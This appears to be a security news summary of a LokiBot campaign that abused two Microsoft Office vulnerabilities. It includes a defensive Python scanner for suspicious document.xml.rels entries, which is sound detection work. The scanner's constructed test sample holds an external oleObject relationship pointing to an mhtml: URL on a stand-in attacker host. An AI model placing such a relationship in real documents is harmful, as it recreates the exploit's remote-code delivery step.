FortiGuard Labs recently came across a new LokiBot campaign that exploited a pair of well-known vulnerabilities in Microsoft Office documents. The campaign first came to light in May while researchers were investigating two types of Word documents.
Diving into details
According to researchers, threat actors exploited two remote code execution vulnerabilities, tracked as CVE-2021-40444 and CVE-2022-30190, to embed malicious macros within Microsoft documents.
Initially, the attack was launched using Word documents affected by CVE-2021-40444. The document contained a "document.xml.rels" file carrying an MHTML link; when that link was processed, it delivered a file that exploited the second vulnerability.
Toward the end of May, the attackers changed tactics by embedding a VBA script within the Word document.
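The "document.xml.rels" part mentioned above is a plain XML file inside the .docx zip container, so the external MHTML relationship the campaign relied on can be flagged before the document is ever opened. The scanner below is an added example written for this summary, not FortiGuard's tooling; the sample document, the "attacker.example" host and the relationship ids are constructed placeholders.

```python
"""Flag external relationships in word/_rels/document.xml.rels whose target is
an MHTML or remote URL, the loader pattern used to reach CVE-2021-40444."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PATH = "word/_rels/document.xml.rels"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# A normal document never needs a relationship that points at an MHTML,
# HTTP(S) or UNC target; any of these in an External relationship is suspect.
SUSPICIOUS_TARGET = re.compile(r"^(mhtml:|https?://|\\\\)", re.IGNORECASE)


def find_external_targets(docx_bytes: bytes) -> list:
    """Return every External relationship whose Target looks remote or MHTML."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return hits
        root = ET.fromstring(zf.read(RELS_PATH))
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        target = rel.get("Target", "")
        if rel.get("TargetMode") == "External" and SUSPICIOUS_TARGET.match(target):
            rel_type = rel.get("Type", "").rsplit("/", 1)[-1]  # e.g. oleObject
            hits.append({"id": rel.get("Id"), "type": rel_type, "target": target})
    return hits


def build_sample_docx(rels_xml: str) -> bytes:
    """Build a minimal constructed .docx (test input only, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


# Constructed sample: one benign internal relationship and one external
# oleObject relationship with an mhtml: target (placeholder host, no payload).
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://attacker.example/doc.html" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for hit in find_external_targets(build_sample_docx(SAMPLE_RELS)):
        print(f"suspicious {hit['type']} relationship {hit['id']} -> {hit['target']}")
```

On a mail gateway or triage box the same function can be run over every attachment; a hit is a reason to quarantine the file and check whether Office is patched against CVE-2021-40444.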
The VBA script created an INF file to load a DLL file that downloaded a second-stage code injector from a URL.
The injector incorporates various evasion techniques to enable the attackers to execute LokiBot malware in the final stage.
About the LokiBot version used
Upon analyzing the C2 traffic, researchers determined that the version of LokiBot used in the campaign includes an MD5 hash.
This hash serves as a mutex to ensure that multiple instances of the malware are not running simultaneously.
LokiBot, a persistent and widespread malware, continues to dominate the threat landscape as its operators evolve their propagation methods. In this campaign, the info-stealer managed to spread by exploiting old vulnerabilities. Therefore, organizations must ensure that they are running the latest version of Microsoft Office. It is also crucial to stay informed about cybercriminals' latest tactics and techniques in order to implement strong security measures. This is where solutions that boost real-time cyber situational awareness come into play.